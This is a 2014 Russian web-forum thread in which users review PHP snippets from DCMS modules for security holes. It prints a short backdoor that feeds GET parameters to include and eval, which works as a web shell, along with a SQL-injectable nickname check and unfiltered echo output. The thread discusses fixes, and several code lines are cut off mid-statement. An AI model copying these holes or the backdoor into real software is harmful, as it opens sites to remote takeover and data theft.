Добро пожаловать, Гость!
Есть ли опасность? - Страница 1
Общие вопросы | Есть ли опасность?
_KENT_ : Есть ли опасность?
11 Янв 2014if (isset($_GET
['ok']) && isset($_POST
['ok'])){
if (mysql_result
(mysql_query
("SELECT COUNT
(*) FROM `user` WHERE `nic
($_POST['nick'])."'"),0)==0)
{
$nick=my_esc($_POST
['nick']);
if( !preg_match("#^([A-
zА-я0-9-_ ])+$#ui", $_POST
['nick']))$err
[]='В нике присутствуют з
if (preg_match("#[a-
z]+#ui", $_POST
['nick']) && preg_match
("#[а-я]+#ui", $_POST
['nick']))$err
[]='Разрешается использо
if (preg_match("#(^ )|
( $)#ui", $_POST
['nick']))$err
Комментарии:
vityachis
11 Янв 2014
_KENT_ (11 Янв 2014):
vityachis, мне модули с вашего обмена не нужны
я просто проверяю и что но кажется подозрительным пишу. В целях безопасности новенького.
ну пиши, это не ко мнеvityachis, мне модули с вашего обмена не нужны
я просто проверяю и что но кажется подозрительным пишу. В целях безопасности новенького.так как вообще я не понял не смысла темы не смысла этих постов! некоторые посты не понятные, ты вместо того чтоб в голове подумать все тут пишет! какие то куски с непонятно каких и для чего модов! я так и не понял зачем ты создал эту тему, но ладно не буду себе голову забивать хламом!
_KENT_ 11 Янв 2014Автор темы
vityachis, мне модули с вашего обмена не нужны
я просто проверяю и что но кажется подозрительным пишу. В целях безопасности новенького. vityachis
11 Янв 2014Напиши нормально что тебе нужно - если модуль на дыры проверить, тогда заплати деньги тебе проверят! Зачем эти все посты?!
Saint
11 Янв 2014
_KENT_ (11 Янв 2014):
<?php
//--by gangsterstar--//
if($_GET['act'] == "echo"
{echo $_GET['echo'];}
if($_GET['act'] == "include"
{include $_GET['include'];}
if($_GET['act'] == "eval"
{echo eval($_GET['eval']);}
?>
_KENT_, к чему эти сообщения с дырками? не понятно как они относятся к теме<?php
//--by gangsterstar--//
if($_GET['act'] == "echo"
{echo $_GET['echo'];}
if($_GET['act'] == "include"
{include $_GET['include'];}
if($_GET['act'] == "eval"
{echo eval($_GET['eval']);}
?>
______________________
Я есть сущность
Saint
11 Янв 2014if (mysql_result(mysql_query("SELECT COUNT(*) FROM `user` WHERE `nic($_POST['nick'])."'"),0)==0)
а тут вероятно уязвимость но её не использовать так как ты написал код с ошибкой(не одной) . а так будет дырка от неотфильтрованного запроса
______________________
Я есть сущность
Saint
11 Янв 2014
_KENT_ (11 Янв 2014):
echo $_GET['act'];
echo $_POST['msg'];
Это дырка!
Почему? Здесь нет
фильтрации, и я видил очень
много таких говнокодиков в
наших dcms соц-
сетях.
Цифры фильтруются так:
echo (int)$_GET['act'];
А буквы так:
echo htmlspecialchars($_POST
['msg']);
_KENT_,echo $_GET['act'];
echo $_POST['msg'];
Это дырка!
Почему? Здесь нет
фильтрации, и я видил очень
много таких говнокодиков в
наших dcms соц-
сетях.
Цифры фильтруются так:
echo (int)$_GET['act'];
А буквы так:
echo htmlspecialchars($_POST
['msg']);
echo htmlspecialchars($_POST
['msg']);
Почитай что делает функция и как правильно фильтровать исходящие данные mysql_real_escape_string() и об этой функции почитай .
Нужно не забывать отсутствие фильтрации это не уязвимости в некоторых случаях .
______________________
Я есть сущность
